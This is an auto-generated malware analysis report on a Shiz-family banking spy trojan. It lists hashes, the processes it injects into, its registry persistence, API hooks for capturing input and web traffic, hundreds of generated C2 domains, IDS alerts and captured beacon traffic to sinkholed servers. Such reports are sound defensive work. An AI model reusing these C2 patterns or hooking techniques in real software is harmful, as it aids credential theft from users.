Gen.Variant.Kazy.24453_117d755a61

by malwarelabrobot on February 14th, 2018 in Malware Descriptions.

Gen:Variant.Kazy.24453 (BitDefender), VirTool:Win32/Obfuscator (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.PWS.Ibank.456 (DrWeb), Gen:Variant.Kazy.24453 (B) (Emsisoft), Generic BackDoor.yg (McAfee), SecurityRisk.gen1 (Symantec), Trojan-Spy.Agent (Ikarus), Gen:Variant.Kazy.24453 (FSecure), Win32:MalOb-KC [Cryp] (AVG), Win32:MalOb-KC [Cryp] (Avast), TROJ_AGENT_030995.TOMB (TrendMicro), Gen:Variant.Kazy.24453 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan-Spy, Trojan, Backdoor, VirTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 117d755a614fecf3d0e7fc2039733121
SHA1: 4e83442e8b940f5a2ec10f8ce00cd8a776852078
SHA256: 45bdc1f16c72132f5d7645dcdcc13c43262a3d26618755821973cb1d07ccb3f5
SSDeep: 3072:Owa0FSXxkcY93I6xeRSS05Im/vm8ud2U/ivJM7EATL5Bc9RuP6369u8cNzj:90XxEJARSS0tpa5/iiAATrARAp08czj
Size: 269312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company:
Created at: 2006-08-12 01:14:56
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Spy. Spy program intended for stealing user's confidential data.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2960

The Trojan injects its code into the following process(es):

taskhost.exe:1940
Dwm.exe:2008
Explorer.EXE:2024
conhost.exe:3700

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\AppPatch\pcqovw.exe (1963 bytes)
C:\Windows\System32\config\SOFTWARE.LOG1 (4529 bytes)
C:\Windows\System32\config\SOFTWARE (4972 bytes)
C:\Windows (4 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\D2BB.tmp (0 bytes)

Registry activity

The process %original file name%.exe:2960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"10f5f7ed" = "YM3&}=Ã¢â‚¬â€ZÃƒÂ®ÃƒÅ¡Ã‚Â¹Ã‚ÂÃ‚ÂªÃƒÂ¡Zh{ÃƒÂm$Ã¢â‚¬â€[ÃƒÂ¼ÃƒÂ¾{ÃƒÂ²:Ãƒâ€™ÃƒÂ£Ã‚Â¬Ã¢â‚¬Å“Ã…Â¡Ã‚Â²Ã‚Â©#ÃƒÂº;Ã‚Â³Ã‚Â³Ãƒâ€˜Ã…Â¡qr{Ã‚Â¬Ã‚Â´3A#jÃ†â€™2r Ãƒâ„¢9Ãƒâ€šÃ‚Â².Ã‚Â²ÃƒÆ’tÃ¢â‚¬Å¡Ã‚Â¾sÃƒÂºÃ…Â¾Ãƒâ€š2Ã‚Â¡DÃ¢â‚¬â„¢*Ã…â€™Ãƒâ€ºDÃƒÂ¶Ã‚Â¶Ã‚Â¬Ã†â€™j~Ã…Â¾2Ã¢â‚¬ÂºÃ‚Â©Ã‚ÂÃ…Â¡Ã¢â‚¬â„¢ Ã¢â‚¬â„¢ÃƒÂ®#nNÃ‚Â¬dLRÃƒâ€ºÃ‚Â«jÃ‚Â¢avÃƒÅ“d~Ã¢â‚¬ÂºÃ…Â CÃƒÂ²6Ãƒâ€šÃƒâ€¹Ã¢â‚¬Â¹SÃ‚Â±ÃƒÂ£RÃ‚Â«9Ã‚Â±iÃƒÂ¹,Ã‚Â©Ãƒâ€“Ã…Â Ãƒâ€°Ã…Â ÃƒÂVÃ¢â‚¬Å¡BÃ¢â‚¬Å¡Ã…Â½Ã…Â¾Ã‚Â¹ÃƒÂªÃƒÅ ~ÃƒÅ |[ÃƒÂ«Ã‚ÂºÃ¢â‚¬ÂºACÃ¢â‚¬Â¹ÃƒÂ¹ÃƒÂ©ÃƒÂ¬>aÃƒâ€ ÃƒÂ¢Ã¢â‚¬ËœÃ‚Â¤Ãƒâ„¢{Ã‚Â²ÃƒÂ¢Ã†â€™i Ã¢â€žÂ¢Ãƒâ€™RKfÃ¢â‚¬Â¹Ã‚Â¾ÃƒÂ»ÃƒÅ’ÃƒÂºBÃ¢â€žÂ¢Ã…Â Ã¢â‚¬Å¡cNÃ‚Â¾;Ã†â€™ÃƒÂ¼ÃƒÂÃƒâ€˜DZÃ‚Â©4Fd1Ã¢â‚¬Å“[Ã…â€™Ãƒâ€¹ÃƒÅ Ã‚Â±ÃƒÂ¹Ã‚Â«i AÃ¢â‚¬â„¢ÃƒÂ£Ã†â€™jÃƒâ€¹ Ã¢â‚¬Â°Ã¢â‚¬Â ÃƒÂ¼Ãƒâ€œÃƒÂ¡sÃƒÂ±QU"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ose00000.exe, , \??\C:\Windows\apppatch\pcqovw.exe_, \??\C:\Windows\apppatch\pcqovw.exe"

Dropped PE files

MD5	File path
5b40e6f460420f1bb0416fe6bd4744a4	c:\Windows\AppPatch\pcqovw.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Trojan installs the following user-mode hooks in USER32.dll:

SendInput
GetClipboardData
GetMessageW
TranslateMessage
GetMessageA
GetWindowTextA

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExW
InternetReadFileExA
InternetReadFileExW
InternetQueryDataAvailable
InternetReadFile
InternetCloseHandle

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Trojan installs the following user-mode hooks in WS2_32.dll:

gethostbyname
WSARecv
send
recv
WSASend

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	19529	19968	4.48404	1db12597f91f23e229694213fb3808ff
.aqTq	24576	957	1024	3.00152	23fb15f68211bd165ec46bc64d4565c0
.fu	28672	1567	1536	3.85701	33b0aeb2d85c8ec7e701ec91325cb2a1
.rdata	32768	4306	4608	3.44262	5a155aa60a08b2078773683d2b57a35d
.GBaH	40960	3211	2048	4.05185	188a5ac3493513bc9550380e6139d5d7
.data	45056	532395	218624	5.54023	81971bcb8f636cd94e3ca35c320e835c
.p	577536	2231	2048	0	c99a74c555371a433d121f551d6c6398
.M	581632	1682	1536	4.19756	b9d1c9df1c5fa35bc9f69c9552ed99ef
.rsrc	585728	16860	16896	2.04565	c59b6f8989f5356a996974ef7241491f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 12
2a61a4f36ee817d46669a2822783358e
9a1af005fdce0515fad53d1c673287f6
e6dc74e5e7a4a16b1f5d0444d3a931cd
62ddc3124e1f4e0f611fa957302d6ebd
42cd8d5c7b87d08f5cb690da177624c1
c1017b37bd3391d07488921ab5736e4c
bab6ef72c8878b0ed29617e66b208bf5
ecb2491df37dd9e3b9e474fd0012b577
d9c56d492bd81bab02f80c13db0ffd4d
e72ff4f16dfe5d78a09af261bb715f5a
0e6c057af2b6818f3f8b874f737d810d
8a30b7861795487c8e4eaa1a9afe85a2

URLs

URL	IP
hxxp://xuxusujenes.eu/login.php	208.100.26.251
hxxp://cihunemyror.eu/login.php	23.253.126.58
hxxp://mamixikusah.eu/login.php	104.27.136.34
hxxp://2track.info/Hohw	52.57.130.23
divesosisor.eu	23.253.126.58
kefuwidijyp.eu	23.253.126.58
fokyxazolar.eu	23.253.126.58
tunujolavez.eu	23.253.126.58
tucyguqaciq.eu	23.253.126.58
mavinifenam.eu	23.253.126.58
gacezobeqon.eu	23.253.126.58
gadufiwabim.eu	23.253.126.58
nojejecebuw.eu	23.253.126.58
foxivusozuc.eu	23.253.126.58
diselahidaf.eu	23.253.126.58
vojacikigep.eu	23.253.126.58
xukovoruput.eu	23.253.126.58
vocumucokaj.eu	23.253.126.58
vojeqamutuf.eu	23.253.126.58
ciliqikytec.eu	23.253.126.58
tupazivenom.eu	23.253.126.58
marytymenok.eu	23.253.126.58
lyvejujolec.eu	23.253.126.58
ryqecolijet.eu	23.253.126.58
gatedyhavyd.eu	23.253.126.58
jefapexytar.eu	23.253.126.58
jenokirifux.eu	23.253.126.58
kemocujufys.eu	23.253.126.58
lyruxyxaxaw.eu	23.253.126.58
vopibycywow.eu	23.253.126.58
cinepycusaw.eu	23.253.126.58
dixesywyruc.eu	23.253.126.58
ciqanukaxas.eu	23.253.126.58
jewuqyjywyv.eu	23.253.126.58
lysuxinebyg.eu	23.253.126.58
fodakyhijyv.eu	23.253.126.58
rynazuqihoj.eu	23.253.126.58
xuqohyxeqak.eu	23.253.126.58
rycovuvutiq.eu	23.253.126.58
puzutuqeqij.eu	95.211.174.92
vocebufazap.eu	23.253.126.58
nopegymozow.eu	23.253.126.58
www.bing.com	204.79.197.200
vonodecidid.eu	23.253.126.58
qeqinuqypoq.eu	23.253.126.58
nojycutalop.eu
foqotihalun.eu
nofagoteveg.eu
nomocykyqiq.eu
rynovaqidef.eu
kefobojexyl.eu
makolacynyd.eu
xubysaxywil.eu
disojawogaw.eu
tucipipumig.eu
kevedorozup.eu
tufecagemyl.eu
kericoxojil.eu
masawocipel.eu
gadinubidyp.eu
cidyrecavok.eu
fobuvohevor.eu
novacofebyz.eu
cihakotihuz.eu
fodutazenaf.eu
digumihurit.eu
novewecoliv.eu
ganudasajov.eu
vowuqykecij.eu
lysygyjytad.eu
vonokutuwah.eu
lyxesyrecoj.eu
qebifopalaz.eu
rydurevohed.eu
tuwyjyvymuq.eu
masisokemep.eu
rylodoqakal.eu
xudevunymex.eu
nozubacezyb.eu
nofexekakuk.eu
ryqanylofuq.eu
nopolomojen.eu
nopuputyboh.eu
nofyjikoxex.eu
jefejurenyp.eu
tunyzylazuj.eu
pujibylityp.eu
galupehudev.eu
dimevuwevuj.eu
puzecypigyw.eu
xudutoxakur.eu
dirutewaled.eu
pupatololoz.eu
xuxanexusov.eu
ryteqipogoz.eu
xubifaremin.eu
fobirybakes.eu
tulojigakit.eu
voniqofolyt.eu
rynudepebur.eu
galerywogej.eu
ryqyqequsud.eu
foqinywenec.eu
cicafykemaj.eu
qeguhapyrer.eu
dikatahyqar.eu
qedixogazen.eu
cicynefogic.eu
qeqekepokul.eu
puvugulynum.eu
gaturuzuqyx.eu
gaqyqewymow.eu
rynikulokop.eu
maganomojer.eu
maravatudur.eu
pujepigeviz.eu
lykujedofod.eu
marugofazez.eu
qederepuduf.eu
qetityluruj.eu
divulewybek.eu
tulyrylynyc.eu
xudiherodos.eu
tucumyvipys.eu
jejedudupuc.eu
kepatixidyg.eu
novugukupap.eu
volebatijub.eu
vofozymufok.eu
pumytugofup.eu
qedefulywoh.eu
lyrefanyril.eu
pupucuvymup.eu
keraborigin.eu
gadoposuwif.eu
fotoxysupyd.eu
kejywajazok.eu
galokusemus.eu
vofubimipeg.eu
citonocebyl.eu
kezapyjolek.eu
rynyhipexon.eu
lykonurymex.eu
nozulufynax.eu
qeqyvulidox.eu
norebituwez.eu
nopiwatyqul.eu
puvopalywet.eu
mamunekuryd.eu
fobexawumov.eu
xutufojisyl.eu
nopodykecoc.eu
maxyvycebid.eu
xugelurisep.eu
divywysigud.eu
volocecaluk.eu
gadedozymiz.eu
jewokedokaw.eu
foqaqehacew.eu
xukuqyruwoq.eu
jefogixuqyn.eu
xuxorixurez.eu
ciqivutevam.eu
jewemurutyj.eu
marefomecef.eu
xuquranifir.eu
rytuvepokuv.eu
kemimojitir.eu
dixilibaxop.eu
fokikebyvaj.eu
novomyfexij.eu
pufyjulogih.eu
qetunopifef.eu
magusecutuk.eu
rylefogohan.eu
foxofewuteq.eu
tufamugevih.eu
ryturilidom.eu
rycypolavag.eu
volyrukupoq.eu
gatykibojig.eu
qedylaqecel.eu
masovufohoh.eu
tujaculurim.eu
qeqohevazud.eu
xukyhudokex.eu
fodavibusim.eu
qekusagigyz.eu
fogeliwokih.eu
fokafobeqix.eu
gacokahurol.eu
xubolyjazaq.eu
cilakyfaloq.eu
foxehehywef.eu
puvacigakog.eu
fogokozazit.eu
qekikyvutic.eu
ganycyhywek.eu
rynepevymuc.eu
maxyjofytyt.eu
tuwobiloloh.eu
gacypizohut.eu
vofukykojos.eu
nozydemutik.eu
makexotevyl.eu
pumadypyruv.eu
jeluganusog.eu
makiwemihiw.eu
noveditifan.eu
kemadedevak.eu
makymykakic.eu
fodyfuzexyp.eu
cilupakuquk.eu
dixyjohevon.eu
kepabydokas.eu
purumulazux.eu
gatonazytab.eu
lyvoxajohul.eu
cihipifebep.eu
qebequgyqip.eu
ryqudigyqog.eu
lyrosajupid.eu
tuwypagupeb.eu
makagucyraj.eu
vowidimajaz.eu
rylyzevipyw.eu
divoxehaceb.eu
digalyzohyx.eu
qedoqyvoguq.eu
jeloperajov.eu
fodihywalyj.eu
cicezomaxyz.eu
lygegoxidul.eu
fotyriwavix.eu
xubeqidudyh.eu
pupiwopexof.eu
tufozequwyd.eu
purodogidot.eu
cihevykupoc.eu
tucakaqalav.eu
jecocinywut.eu
kemawonywig.eu
jeceraxaxol.eu
xugosedaloc.eu
lyxilunogem.eu
jewezexigaf.eu
lysowaxojib.eu
qetaseqyquv.eu
lyrojunynah.eu
gahocuwalyc.eu
dimoxuzynup.eu
mavasatokyf.eu
foxalihynut.eu
jecuzojitub.eu
lymajaxecir.eu
xutohonutyn.eu
norupamaxur.eu
kevajerajoq.eu
cidufitojex.eu
rytecyvaxuj.eu
pumumagojef.eu
xuxukanoluf.eu
xudosorihug.eu
vocijekyqiv.eu
cinorufifac.eu
kefilyrymaj.eu
tufigolidat.eu
nofuwufutom.eu
tupamapazer.eu
masytoturen.eu
cilynitiseg.eu
puzydaqybad.eu
qegefavipev.eu
qexanevymyk.eu
kepymexihak.eu
cidacomutur.eu
maxifakofyk.eu
jecoqedevod.eu
cilyzycojod.eu
dimyfebidec.eu
citifemifif.eu
citykimipat.eu
ryqukavecek.eu
puzoxyvojyc.eu
xutityjigac.eu
dixemazufel.eu
noretekyvuv.eu
citydekohiw.eu
disisizazim.eu
vopogakakud.eu
novixamymyf.eu
ciqirokajyr.eu
digivehusyd.eu
puvewevodek.eu
dirosehijel.eu
citizufurah.eu
qeqaxupogog.eu
lygananavof.eu
xutevexecif.eu
xuguxujytej.eu
lyselojumyr.eu
nozapekidis.eu
dikiwewutav.eu
ciqukecywiv.eu
qegovyqaxuk.eu
jejajaduwok.eu
qebolelofyc.eu
vonabakyvyk.eu
qedosiputot.eu
tuwaguguwux.eu
kefidaxupif.eu
divinuheluz.eu
cilodamenub.eu
jepazunalyx.eu
qegytuvufoq.eu
pumebeqalew.eu
vojomekisuw.eu
volaqutodox.eu
pupegeqifev.eu
qexusulakiq.eu
xutyrurojah.eu
nofotycywos.eu
marixecoguv.eu
vofapacebuv.eu
puzomipipin.eu
dimomawezod.eu
lyvevonifun.eu
nomojatudyn.eu
jepycudijyq.eu
tulekuvigij.eu
rydohyluruc.eu
lymevyrajas.eu
xuqiloxyvyf.eu
gaduzehokar.eu
kemuxurohym.eu
tufydopogab.eu
ryhadyvigis.eu
vococumecan.eu
fokalesaxav.eu
dikuvizigiz.eu
foxyxubecuh.eu
puralevuqes.eu
ryqofuvenoc.eu
ryhoqagoxyr.eu
ryhuzilywax.eu
kepypirutyx.eu
nozejimuqag.eu
pumojopymol.eu
gatahohalir.eu
gaqirahebof.eu
xudakejupok.eu
lykatojexub.eu
tulimolywan.eu
lyxemoxyquf.eu
nozomotokyt.eu
digyxywifyq.eu
tulyboputal.eu
jewidonevin.eu
fogisysemyq.eu
teredo.ipv6.microsoft.com
xuboninogyt.eu
masenucifoc.eu
mavulymupiv.eu
tunodavuqew.eu
jefyqynofaj.eu
tufyquvaxic.eu
qekorelelyq.eu
keretejuraw.eu
rytozygyvup.eu
jepuderymas.eu
lyrynixakyn.eu
pufobogyqan.eu
citeqotacyn.eu
xugiqonenuz.eu
lyvoguraxeh.eu
fokuquwifys.eu
dixonesohed.eu
xuqufyduras.eu
kezituraxep.eu
ryqozapaleb.eu
jepemadodiv.eu
vocakemenir.eu
lygyxeruqoc.eu
qexofyqihid.eu
purupoqogob.eu
nojepofyren.eu
ciqapomogyg.eu
qekyhugisih.eu
ryhevelynyj.eu
lyrimirohyp.eu
pufepepazyd.eu
tupepulofup.eu
puregivytoh.eu
gahihezenal.eu
rycaropynar.eu
cilavocofer.eu
cinycekecid.eu
jenabejurov.eu
fodixohofiz.eu
dirojubusux.eu
puzewilurip.eu
ryloqulebih.eu
nozoxucavaq.eu
qekenilacap.eu
masygekevuq.eu
qexoligupag.eu
jeluzydyqej.eu
kejogydideq.eu
jepogejebak.eu
dikoniwudim.eu
xutekidywyp.eu
vocerocofyf.eu
mavejykidij.eu
vojizitoken.eu
norijyfohop.eu
rydinivoloh.eu
pufucaqurak.eu
pujulapohar.eu
jenujoxojug.eu
jenerunybem.eu
nomugacogyk.eu
rytifaquwer.eu
xudunudeveq.eu
mamylotifat.eu
diravasymob.eu
tujurogacag.eu
jefubonokiz.eu
cicucifokym.eu
qequroquweb.eu
rynenogupez.eu
lyrelydevac.eu
tujigevojyj.eu
kevopoxecun.eu
jepororyrih.eu
pujuduvaxim.eu
dimutobihom.eu
jeniceripoj.eu
cidizakisuv.eu
nojogefumuc.eu
tupyjoqirof.eu
nomytifazah.eu
rycucugisix.eu
vonupyfogiq.eu
jejykaxymob.eu
tupikogyqoz.eu
keryxadalid.eu
xudylenyrob.eu
ganuqibevux.eu
kemygexaxab.eu
jejopiniduh.eu
xukorejymod.eu
ganazywutes.eu
tujeqoqybar.eu
gaquviwyrup.eu
foqykasisof.eu
vojugycavov.eu
cidaqyfynos.eu
kefaxyjebav.eu
kezubaxemor.eu
vowezacuryr.eu
foguhosecib.eu
xubateditid.eu
jelimixecuz.eu
puvutaputeb.eu
kejitanokon.eu
cihocytodoh.eu
tunicyqokuv.eu
puzigagacal.eu
qegarigohox.eu
noralycifok.eu
tunarivutop.eu
kemelixakyz.eu
fokisohurif.eu
dirugihofug.eu
lykysonalut.eu
tujajepifyv.eu
lysovidacyx.eu
gaqofubakeh.eu
kerijudacyj.eu
puryxepenek.eu
digegazolan.eu
gahoqohofib.eu
nomebemenid.eu
disafuwokis.eu
lymunyjigak.eu
nopexifigep.eu
maxotikojax.eu
vofomifyrex.eu
digowibymih.eu
rydacoqybob.eu
qetekugexom.eu
jelekynurep.eu
divamubojum.eu
tupibevecev.eu
kejudunogex.eu
purowuqokuq.eu
vonezukemac.eu
vojedufynoj.eu
qebexequsyw.eu
fogavewogad.eu
kezigojohuf.eu
volugomymet.eu
mamomamymyl.eu
xuxivydifoj.eu
lysumedalik.eu
nofucemihub.eu
gahyfesyqad.eu
magalukacom.eu
lysafurisam.eu
xuqaxiraxyx.eu
cinyhotyqyt.eu
masijemaxud.eu
rycuheqojyk.eu
novylakuwyw.eu
vofydatacut.eu
lyxuworenuz.eu
vowucotyqyg.eu
tucoqepyryk.eu
maxagamisyb.eu
jecijyjudew.eu
pufotyvecyq.eu
marawukyqos.eu
fokenuzohym.eu
dirynozebot.eu
gacuhawipod.eu
gahuzuzecyg.eu
cidohukigeq.eu
voporitevet.eu
ciciqacidir.eu
foqilozutoz.eu
xuqesunipam.eu
gahadyburaq.eu
galicasevor.eu
cinafocuryb.eu
tucadilebix.eu
ryhekoputag.eu
nojibukojoj.eu
jecygyrogec.eu
xuxetiryqem.eu
kejycirenuh.eu
galavozaxog.eu
jepuqoxupit.eu
vowagufifam.eu
lymigadybiv.eu
fobonobaxog.eu
fotaqizymig.eu
fogynahidal.eu
magofetequb.eu
magymofigeg.eu
vojykocezel.eu
foderasyqaw.eu
pupexuguwun.eu
nofidocyner.eu
makififupap.eu
lygujirupum.eu
rylicepyryf.eu
disenybuqyj.eu
kepicynezam.eu
tucyzogojat.eu
cihyrimymen.eu
gacenysacew.eu
qeketaqojyf.eu
lygetudokej.eu
pufiluqudic.eu
fogytubuwyx.eu
galefihituz.eu
tupudyqusuj.eu
galuhubywum.eu
xutoxedyniq.eu
maxuwitalag.eu
lymosudyqym.eu
jelaqirozum.eu
nojotomipel.eu
tuwikypabud.eu
vopepukaxej.eu
lyvitexemod.eu
puvybivihox.eu
rydyvigecot.eu
lymylorozig.eu
magetyfisus.eu
xubukyrecax.eu
dixotuzipuh.eu
qekovipynan.eu
fobahizipux.eu
rydopapifel.eu
tunegapenef.eu
nomawimecat.eu
qetuluvolos.eu
ciqehefitij.eu
gacovybybec.eu
pumelilebon.eu
disumesenyv.eu
jenupydaces.eu
divufozutog.eu
qebahilojam.eu
kevybunureh.eu
qeqotogemet.eu
qedunygajux.eu
kerowyripac.eu
ryleryqacic.eu
nojuletacuf.eu
rycefelelys.eu
makysimodan.eu
foxyqosajol.eu
puvojyqevus.eu
vonymomaxyb.eu
keryginebyp.eu
voworemoziv.eu
jefecajazif.eu
xukafinezeg.eu
pumipuvupuj.eu
kejamerecos.eu
maxaxyfumim.eu
mamasufexix.eu
cinivamolil.eu
mamyfycoliq.eu
gaciduwifuh.eu
mavitacazyw.eu
fobatesohek.eu
marimutitom.eu
vopejamogul.eu
lyvufixyvet.eu
lymutinutyz.eu
ganofazigor.eu
dimewohokol.eu
lygivejynow.eu
qetevavahew.eu
qexukoqodar.eu
qegiqiqakof.eu
jewypojynil.eu
kezeceduwov.eu
vofejutalom.eu
qeburuvenij.eu
gaqecizupun.eu
jejubyrexeq.eu
ryhuneqevyv.eu
jejomejoled.eu
lyxufejazov.eu
fobykuwyruq.eu
gaqehysohec.eu
lygowunezep.eu
gadekewexac.eu
ryhipugajim.eu
gatuvesisak.eu
foxirozigon.eu
kepolonavit.eu
lykemujebeq.eu
rytahagemeg.eu
dikexosajif.eu
kezajonifuz.eu
kefeminalyn.eu
cicidutuwap.eu
kefypadofiw.eu
tuwucopexot.eu
dikegybecys.eu
qetoqolusex.eu
xuxehajexuw.eu
volojifebeh.eu
qeguxylevus.eu
gaherobusit.eu
xugefexojow.eu
gatopuwenyq.eu
kepujajynib.eu
cicaratupig.eu
pupujeguper.eu
dikujysozyk.eu
rydekyqyquw.eu
kevimudyqec.eu
jewobuxisyt.eu
dixuvebakeq.eu
ganenihynug.eu
xukuxaxidub.eu
magijityboz.eu
cihihacakuf.eu
jefiredisav.eu
jejurijogut.eu
tuwaraqidek.eu
voluzefexus.eu
digofasexal.eu
xuqeqejohiv.eu
tujybuqeqis.eu
fotasawezak.eu
xugynajuquf.eu
fotulybidyq.eu
norumikemem.eu
pujamyqywyk.eu
mavyvomuqal.eu
cinuqumahag.eu
lykolexusol.eu
lyxaxududes.eu
qexyqapevyb.eu
foqesibojup.eu
tufukelityq.eu
lyvywyduroq.eu
vocupotusyz.eu
dimigesupew.eu
kevylejigod.eu
nopymecurud.eu
ciqydofudyx.eu
vopycyfutoc.eu
pujoxolufag.eu
kejaxoxuqut.eu
jeledajifor.eu
gadaqusupyj.eu
tulipeqevyw.eu
tuniqigison.eu
fotyfahokab.eu

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Ransomware Tracker Reported CnC Server group 198
ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /Hohw HTTP/1.1

Host: 2track.info

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Cache-Control: max-age=0, private, must-revalidate

Content-Type: text/html; charset=utf-8

Date: Tue, 13 Feb 2018 20:38:26 GMT

ETag: W/"a27a2e1bf6d4733c9f5d3ac462bfeb0f"

Server: nginx

Set-Cookie: cl_id=224811d0c48767609ba0b8d6dcbced551432b137; path=/; expires=Wed, 14 Feb 2018 20:38:26 -0000

Set-Cookie: s_id=2725; path=/; expires=Wed, 14 Feb 2018 20:38:26 -0000

Set-Cookie: su_id=33077; path=/; expires=Wed, 14 Feb 2018 20:38:26 -0000

Set-Cookie: pros=2725; path=/; expires=Wed, 14 Feb 2018 20:38:26 -0000

X-Frame-Options: ALLOWALL

X-Request-Id: b60a8b33-f91d-47c2-b798-bfac3a4a3e01

X-Runtime: 0.059623

Content-Length: 9914

Connection: keep-alive
<!DOCTYPE HTML>.<html lang="en-US">.<head>.  <met
a charset="UTF-8">.<script type="text/javascript">window.NREU
M||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","errorBeacon":"ba
m.nr-data.net","licenseKey":"d36a65a88a","applicationID":"60998583","t
ransactionName":"IlxdRENWW1tQShZaAghdHFlfXVJP","queueTime":13,"applica
tionTime":59,"agent":""}</script>.<script type="text/javascri
pt">window.NREUM||(NREUM={}),__nr_require=function(e,t,n){function 
r(n){if(!t[n]){var o=t[n]={exports:{}};e[n][0].call(o.exports,function
(t){var o=e[n][1][t];return r(o||t)},o,o.exports)}return t[n].exports}
if("function"==typeof __nr_require)return __nr_require;for(var o=0;o&l
t;n.length;o  )r(n[o]);return r}({1:[function(e,t,n){function r(){}fun
ction o(e,t,n){return function(){return i(e,[f.now()].concat(u(argumen
ts)),t?null:this,n),t?void 0:this}}var i=e("handle"),a=e(2),u=e(3),c=e
("ee").get("tracer"),f=e("loader"),s=NREUM;"undefined"==typeof window.
newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","
setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="
api-",l=d "ixn-";a(p,function(e,t){s[t]=o(d t,!0,"api")}),s.addPageAct
ion=o(d "addPageAction",!0),s.setCurrentRouteName=o(d "routeName",!0),
t.exports=newrelic,s.interaction=function(){return(new r).get()};var m
=r.prototype={createTracer:function(e,t){var n={},r=this,o="function"=
=typeof t;return i(l "tracer",[f.now(),e,n],r),function(){if(c.emit((o
?"":"no-") "fn-start",[f.now(),r,o],n),o)try{return t.apply(this,a<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqohyxeqak.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jefapexytar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciqanukaxas.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocebufazap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

